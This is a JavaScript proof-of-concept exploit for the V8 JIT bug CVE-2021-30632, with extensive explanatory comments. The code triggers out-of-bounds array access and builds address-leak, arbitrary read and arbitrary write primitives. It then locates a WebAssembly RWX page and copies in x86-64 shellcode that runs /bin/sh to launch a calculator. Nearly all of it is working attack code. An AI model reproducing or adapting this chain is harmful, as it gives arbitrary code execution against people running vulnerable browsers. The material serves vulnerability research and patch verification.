cve-2021-30632.js
/*
CVE-2021-30632
HEAD @ 632e6e71c5ff752f8c448061ab32ae2d9b1825ec
https://bugs.chromium.org/p/chromium/issues/detail?id=1247763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-21220 (note: this link names CVE-2021-21220, not the CVE-2021-30632 given above)
*/
// One 8-byte buffer viewed both as a double and as an unsigned 64-bit
// integer. ftoi()/itof() below write through one view and read through the
// other to reinterpret the same bits; host endianness applies to both alike.
var bs = new ArrayBuffer(8);
var fs = new Float64Array(bs);
var is = new BigUint64Array(bs);
function ftoi(val) {
  // Bit-cast a double to a BigUint64 through the shared 8-byte buffer.
  fs[0] = val;
  const bits = is[0];
  return bits;
}
function itof(val) {
  // Bit-cast a BigUint64 to a double through the shared 8-byte buffer.
  is[0] = val;
  const dbl = fs[0];
  return dbl;
}
// Stores its argument in the script-level `_x` (declared further down with
// `var _x = _a`, so this is a hoisted binding, not an implicit global).
// Called from a hot loop in baz(); the exact shape of this function is part
// of the PoC and presumably matters to the JIT tier being targeted.
function foo(x) {
  _x = x;
}
// Writes a double into index 19 of whatever array `_x` currently refers to.
// baz() calls this 100000 times while `_x` is `_b`, then once more after
// `_x` has been swapped to baz's local `arr`.
function bar() {
  _x[19] = 133.7;
}
// Trigger routine for the bug named in the header. Returns its local `oob`
// array (20 doubles); the top-level code then indexes that array at 86 and
// 95, i.e. it relies on the bug having removed the bounds check.
// The iteration counts (40000 / 20000 / 100000) and the order of calls are
// tuned for the V8 revision named in the header; on another build this is
// expected to either do nothing or crash the process — not verified here.
function baz() {
  // arr: 30 small integers plus an extra named property; oob: 20 doubles.
  var arr = new Array(30); arr.fill(1); arr.x = 1;
  var oob = new Array(20); oob.fill(1.1);
  // Warm-up: foo(_b) runs 40000 times; halfway through, `_c[0]` (not the
  // argument being passed) is changed to a double.
  for (let i = 0; i < 40000; i++) {
    if (i == 20000)
      _c[0] = 1.1;
    foo(_b);
  }
  // `_x` is `_b` at this point; store a double into it, then hammer bar().
  _x[0] = 1.1;
  for (let i = 0; i < 100000; i++)
    bar();
  // Point `_x` at the 30-element `arr` and call bar() once more.
  foo(arr);
  bar();
  return oob;
}
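// Script-level arrays handed to foo(): each is a one-element small-integer
// array with an extra named property. `_x` starts as `_a`; foo() later
// points it at `_b` and finally at baz's local `arr`.
var _a = new Array(1); _a.fill(1); _a.x = 1;
var _b = new Array(1); _b.fill(1); _b.x = 1;
var _c = new Array(1); _c.fill(1); _c.x = 1;
var _x = _a;
// `oob` is the 20-element array returned by baz(); the primitives below
// index it far past that length. Declared explicitly with `var` rather than
// as an implicit global so the script behaves the same under 'use strict'.
var oob = baz();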
/* flt.elements @ oob[86] */
/* obj.elements @ oob[95] */
// Allocated immediately after baz() returns; per the two comments above,
// the PoC expects flt's and obj's element stores to sit at oob[86] and
// oob[95] respectively (a layout specific to the build in the header).
let flt = [1.1];       // double array: flt[0] is read/written as raw bits
let tmp = {a: 1};
let obj = [tmp];       // object array: obj[0] is the slot addrof() uses
// Printed for the operator only; the value is never checked, so a
// non-matching build is not detected before the primitives below run.
console.log(oob.length);
// Returns the low 32 bits of the address of `o` as a BigInt.
// Relies on the layout comments above: takes the low half of the oob[95]
// slot (obj's elements, per that comment), keeps the high half of oob[86]
// (flt's elements), and writes the combination back so that flt[0] and
// obj[0] alias the same memory. The trailing `- 1n` is presumably the
// heap-object tag bit (pointer compression assumed — not verified here).
// Indices 86/95 are specific to the build named in the header.
function addrof(o) {
  let a = ftoi(oob[95]) & 0xffffffffn;
  let b = ftoi(oob[86]) >> 32n;
  oob[86] = itof((b << 32n) + a);
  obj[0] = o;
  return (ftoi(flt[0]) & 0xffffffffn) - 1n;
}
// Reads 8 bytes at 32-bit (presumably compressed) address `p` and returns
// them as a BigInt: the low half of the oob[86] slot (flt's elements, per
// the comment above) is replaced with p - 8 + 1, high half preserved, and
// flt[0] is then loaded. `p` is not validated; a bad address faults the
// process rather than throwing.
function read(p) {
  let a = ftoi(oob[86]) >> 32n;
  oob[86] = itof((a << 32n) + p - 8n + 1n);
  return ftoi(flt[0]);
}
// Stores the 64-bit BigInt `x` at 32-bit (presumably compressed) address
// `p`, using the same redirection of flt's element store as read(). `x` is
// converted with itof(), so bit patterns that are NaNs may be canonicalized
// by the engine before landing in memory — not verified here. `p` is not
// validated.
function write(p, x) {
  let a = ftoi(oob[86]) >> 32n;
  oob[86] = itof((a << 32n) + p - 8n + 1n);
  flt[0] = itof(x);
}
// Minimal WebAssembly module written out as raw bytes. Its exports are named
// "memory" and "main" (the ASCII runs 6d 65 6d 6f 72 79 and 6d 61 69 6e are
// visible below) and the single function body is `i32.const 42; end`
// (0x41 0x2a 0x0b). It is instantiated below only so that the instance
// object exists for addrof()/read().
let wasm = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x85, 0x80, 0x80, 0x80,
  0x00, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80, 0x00, 0x01,
  0x00, 0x04, 0x84, 0x80, 0x80, 0x80, 0x00, 0x01, 0x70, 0x00, 0x00, 0x05, 0x83,
  0x80, 0x80, 0x80, 0x00, 0x01, 0x00, 0x01, 0x06, 0x81, 0x80, 0x80, 0x80, 0x00,
  0x00, 0x07, 0x91, 0x80, 0x80, 0x80, 0x00, 0x02, 0x06, 0x6d, 0x65, 0x6d, 0x6f,
  0x72, 0x79, 0x02, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, 0x0a, 0x8a,
  0x80, 0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80, 0x00, 0x00, 0x41, 0x2a,
  0x0b
]);
let module = new WebAssembly.Module(wasm);
let instance = new WebAssembly.Instance(module);
let entry = instance.exports.main;
// Reads one 64-bit word at offset 0x68 from the instance object. The name
// says the PoC expects this to be the address of an RWX region; the offset
// and its meaning are tied to the build in the header (not verified here).
let rwx = read(addrof(instance) + 0x68n);
/* DISPLAY=':0.0' xcalc */
// Raw x86-64 payload. The ASCII inside it spells "/bin/sh", "-c" and
// "DISPLAY=':0.0' xcalc" (matching the comment above) and it ends in what
// looks like a `syscall` (0f 05) — i.e. Linux-only, and if it runs it pops
// a calculator on display :0.0 as the proof of execution.
let shellcode = new Uint8Array([
  0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54,
  0x5f, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x15, 0x00, 0x00,
  0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x27, 0x3a, 0x30, 0x2e,
  0x30, 0x27, 0x20, 0x78, 0x63, 0x61, 0x6c, 0x63, 0x00, 0x56, 0x57, 0x54, 0x5e,
  0x6a, 0x3b, 0x58, 0x0f, 0x05
]);
let buf = new ArrayBuffer(shellcode.length);
let view = new DataView(buf);
// Overwrites the 64-bit field at offset 0x1c of `buf` with `rwx`, so the
// DataView stores below land in that region instead of buf's own memory
// (presumably the backing-store pointer — offset is build-specific).
write(addrof(buf) + 0x1cn, rwx);
// Copy the payload byte by byte through the redirected view...
for (let i = 0; i < shellcode.length; i++)
  view.setUint8(i, shellcode[i]);
// ...then call the wasm export; the PoC relies on that export's code living
// in the `rwx` region that was just overwritten.
entry();